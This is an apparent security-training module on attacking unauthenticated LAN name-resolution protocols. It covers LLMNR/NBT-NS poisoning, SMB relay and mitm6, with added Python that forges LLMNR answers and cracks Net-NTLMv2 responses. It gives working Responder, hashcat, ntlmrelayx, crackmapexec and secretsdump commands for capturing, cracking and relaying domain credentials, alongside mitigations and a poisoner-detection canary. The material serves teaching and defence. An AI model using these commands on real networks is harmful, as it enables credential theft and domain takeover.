The protocols that make networks work (ARP, DHCP, DNS, LLMNR, NBT-NS, mDNS) were all designed with zero authentication. They worked in the original LAN era because the LAN was a single trusted segment. In 2026, these protocols are still deployed at scale, still unauthenticated, and attackers still farm them for credentials daily. This module covers why the network's foundational protocols, from ARP at Layer 2 up to the name-resolution fallbacks Windows runs over UDP, remain catastrophic trust points.
Why this happens
ARP (1982), DHCP (1993), DNS (1987), LLMNR (2007): the dates tell the story. They were designed before network-scale threat models existed, when "the network" meant "the cable in the office." Mitigations exist (DNSSEC for DNS, DHCP snooping and dynamic ARP inspection on managed switches, 802.1X to keep unauthenticated hosts off the segment entirely) but deployment is uneven. Windows workstations, including domain-joined ones, still enable LLMNR and NBT-NS by default unless Group Policy turns them off, despite Microsoft's own security baseline recommending that they be disabled.
The attacker’s position: on the local segment (after phishing or Wi-Fi compromise), inject responses to these unauthenticated protocols. Victim workstations accept the injected responses as truth. Credentials, session info, and lateral movement opportunities follow.
The classic: LLMNR / NBT-NS poisoning
When a Windows workstation fails to resolve a hostname through DNS (a typo, a stale drive mapping, a decommissioned printer, a WPAD lookup), it falls back to LLMNR (UDP 5355, multicast to 224.0.0.252 / FF02::1:3) and NBT-NS (UDP 137, subnet broadcast): "Hey, does anyone know where PRINTER-3RD-FLOOR is?" Neither protocol authenticates answers, so any host on the segment can reply "Yes, that's me." The victim then connects to the attacker and, because the resource it wanted was an SMB share or a web proxy that demands credentials, performs NTLM authentication against the attacker's listener. What is captured is not the NT hash itself but the Net-NTLMv2 challenge/response: it can be cracked offline or relayed while the connection is live, but it cannot be used directly for pass-the-hash.
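The exchange described above, built and parsed in Python as an added example (this is not code from the module, from Responder, or from any other tool the page names). It encodes the victim's multicast query and the poisoner's answer in the DNS wire format that LLMNR reuses, then shows the only fields a victim can check before trusting the answer (transaction ID and name) and the canary test a defender can run on the same segment: query a name that cannot exist and treat any answer as evidence of a poisoner. The hostname, transaction ID and the attacker address 10.20.30.99 are assumptions chosen for illustration; all messages are constructed in memory, so nothing is sent on the wire.

```python
"""Added example: an LLMNR poisoning exchange, built and parsed offline.

LLMNR (RFC 4795) reuses the DNS message format (RFC 1035): a 12-byte header,
a question section and, in responses, answer records. Nothing in it is signed,
so a victim can only match the transaction ID and the name it asked for.
The hostname, transaction ID and attacker IP below are assumed values.
"""
import struct

LLMNR_PORT = 5355            # UDP, multicast 224.0.0.252 / FF02::1:3
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """Hostname -> DNS labels (length-prefixed), zero terminator."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(pkt: bytes, off: int):
    """Decode labels starting at `off`; LLMNR does not use compression pointers."""
    labels = []
    while True:
        n = pkt[off]
        off += 1
        if n == 0:
            break
        labels.append(pkt[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def build_query(name: str, txid: int) -> bytes:
    """What the victim multicasts: QR=0, one question, no answers."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def build_poisoned_response(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner returns: the victim's txid, QR=1, and an A record for itself."""
    txid = struct.unpack(">H", query[:2])[0]
    name, off = decode_name(query, 12)
    question = query[12:off + 4]                       # QNAME + QTYPE + QCLASS, echoed back
    header = struct.pack(">HHHHHH", txid, 0x8000, 1, 1, 0, 0)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(name) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt: bytes) -> dict:
    """The victim's view: header, question and any A answers."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    qname, off = decode_name(pkt, 12)
    off += 4                                           # skip QTYPE + QCLASS
    answers = []
    for _ in range(an):
        aname, off = decode_name(pkt, off)
        rtype, _rclass, ttl, rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
        off += 10
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((aname, ".".join(str(b) for b in rdata), ttl))
    return {"txid": txid, "is_response": bool(flags & 0x8000), "qname": qname, "answers": answers}


def is_poisoner(probe_name: str, response: bytes, sent_txid: int) -> bool:
    """Defender's canary: ask for a name that cannot exist; any matching answer
    means something on the segment is answering LLMNR for names it does not own."""
    r = parse_response(response)
    return (r["is_response"] and r["txid"] == sent_txid
            and r["qname"].lower() == probe_name.lower() and bool(r["answers"]))


if __name__ == "__main__":
    q = build_query("PRINTER-3RD-FLOOR", 0x1234)            # victim's query (constructed)
    resp = build_poisoned_response(q, "10.20.30.99")        # poisoner's answer (assumed IP)
    print(parse_response(resp))
    print("poisoner present:", is_poisoner("PRINTER-3RD-FLOOR", resp, 0x1234))
```

The canary check is the same idea behind LLMNR/NBT-NS honeypot tools: nobody legitimately owns a random name, so a reply proves a poisoner. Note that the check has to match the transaction ID too; a defender that accepts any response can itself be fooled into false positives by unrelated traffic.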
# Start Responder on the attacker's Linux box, attached to the target LAN
# -w rogue WPAD proxy, -r answer NetBIOS wredir queries, -f fingerprint hosts, -v verbose
sudo responder -I eth0 -wrfv
# Responder output (within minutes; challenge/response elided):
# [+] Listening for events...
# [SMB] NTLMv2-SSP Hash captured for alice.smith
# [SMB] Username : CORP\alice.smith
# [SMB] Hash : alice.smith::CORP:abc123...
# Crack offline with hashcat (mode 5600 = NetNTLMv2 challenge/response)
hashcat -m 5600 captured_hashes.txt rockyou.txt
# Or relay the live authentication instead of capturing it. First set SMB = Off and
# HTTP = Off in Responder.conf so Responder only poisons names and ntlmrelayx, not
# Responder, receives the victims' connections. --disable-ess downgrades Extended
# Session Security on the connections Responder still terminates.
sudo responder -I eth0 -dwrfv --disable-ess
sudo ntlmrelayx.py -tf targets.txt -smb2support
A typical 100-employee office with LLMNR enabled often yields 20 or more captured Net-NTLMv2 responses in the first hour. Of those, a few usually crack within minutes against a common-password wordlist, and at that point the attacker holds valid domain credentials.
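What `hashcat -m 5600` actually recomputes, as an added worked example (this is not code from the module, from Responder or from hashcat): the Net-NTLMv2 proof is HMAC-MD5 over the server challenge and the client blob, keyed by a value derived from the NT hash. The attacker knows the challenge (it issued it) and the blob (sent in the clear), so it can try candidate passwords offline and compare. The user, domain, challenge, blob, password and wordlist below are constructed; MD4 is implemented in pure Python because OpenSSL 3 builds of Python frequently refuse `hashlib.new("md4")`.

```python
"""Added example: the arithmetic behind a Responder capture and `hashcat -m 5600`.

Shows that the wire carries a challenge/response (NTProofStr), not the NT hash,
and why that response still cracks offline. Every value below is constructed.
"""
import hmac
import struct
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320), needed because the NT hash is MD4 and many
    Python builds no longer expose it through hashlib."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, order, shifts in rounds:
            for step, i in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[i] + k) & mask, shifts[step % 4])
                a, b, c, d = d, a, b, c          # rotate registers for the next step
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)). Stored in SAM/NTDS; never sent in NTLMv2."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP 3.3.2:
    NTOWFv2   = HMAC-MD5(NT hash, UTF-16LE(upper(user) || domain))
    NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || Blob)"""
    ntowf_v2 = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()
    return hmac.new(ntowf_v2, server_challenge + blob, "md5").digest()


def build_blob(timestamp: int, client_challenge: bytes) -> bytes:
    """Minimal NTLMv2_CLIENT_CHALLENGE: type bytes, reserved, FILETIME, client nonce,
    reserved, empty AV_PAIR list (MsvAvEOL), trailing zero padding."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)


def hashcat_line(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """The `-m 5600` line Responder logs: USER::DOMAIN:challenge:proof:blob (hex)."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guess loop: recompute the proof for each candidate and compare.
    This is why captured responses are worth keeping even though they are not hashes."""
    user, _, domain, chal_hex, proof_hex, blob_hex = line.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for cand in wordlist:
        cand = cand.strip()
        if hmac.compare_digest(ntlmv2_proof(cand, user, domain, chal, blob), proof):
            return cand
    return None


def demo():
    """Constructed capture: a poisoned victim authenticating with a weak password."""
    user, domain, password = "alice.smith", "CORP", "Summer2026!"        # assumed values
    server_challenge = bytes.fromhex("1122334455667788")                  # attacker-chosen
    blob = build_blob(0x01DC5E0A00000000, bytes.fromhex("aabbccddeeff0011"))
    proof = ntlmv2_proof(password, user, domain, server_challenge, blob)
    line = hashcat_line(user, domain, server_challenge, proof, blob)
    wordlist = ["password", "Welcome1", "Summer2026!", "Autumn2026!"]     # constructed
    return line, crack(line, wordlist)


if __name__ == "__main__":
    captured, found = demo()
    print(captured)
    print("cracked:", found)
```

Two things the loop makes visible. First, the server challenge is fresh per connection, so a response captured today cannot be replayed to a server tomorrow; it is only useful for cracking or for relaying while the connection is still open. Second, the per-guess cost is two HMAC-MD5s plus one MD4, which is why the cracking speed in the text ("minutes against common passwords") is realistic on commodity GPUs.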
SMB relay: no cracking needed
Relay does not need the password at all. Instead of capturing the Net-NTLMv2 response and cracking it, the attacker forwards the victim's live NTLM authentication to another server as it arrives; if the victim is a local administrator there, the relayed session gives code execution or a SAM dump on that system as the victim. A response captured earlier cannot be replayed later, because the server challenge is fresh for every connection. Relay works only against servers that do not require SMB signing, and the authentication cannot be relayed back to the host it came from. ntlmrelayx from impacket is the standard tool.
# Find SMB servers with signing disabled (relay target candidates)
crackmapexec smb 10.20.30.0/24 --gen-relay-list relay_targets.txt
# Relay incoming NTLM auth to the target list; -socks keeps each relayed session
# open behind a local SOCKS proxy (default 127.0.0.1:1080) instead of running a one-shot dump
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -socks
# Then use impacket through that proxy as the relayed user; -no-pass because the
# session is already authenticated (proxychains must be pointed at 127.0.0.1:1080)
proxychains secretsdump.py CORP/alice.smith@10.20.30.45 -no-pass
mitm6: DHCPv6 attack
Windows prefers IPv6 over IPv4. Most corporate networks run IPv4 only and never answer DHCPv6, so every Windows client keeps sending DHCPv6 Solicit messages into the segment. mitm6 answers them: it hands out an IPv6 address and, crucially, names the attacker as the DNS server in the reply. Because IPv6 DNS is preferred, the victim's name lookups, including the one for WPAD (Web Proxy Auto-Discovery), now go to the attacker, who can point the browser at a rogue proxy that demands NTLM authentication. Feeding that authentication into ntlmrelayx (classically relayed to LDAP on a domain controller to add a machine account or configure delegation) is the path from a single poisoned workstation to full domain compromise.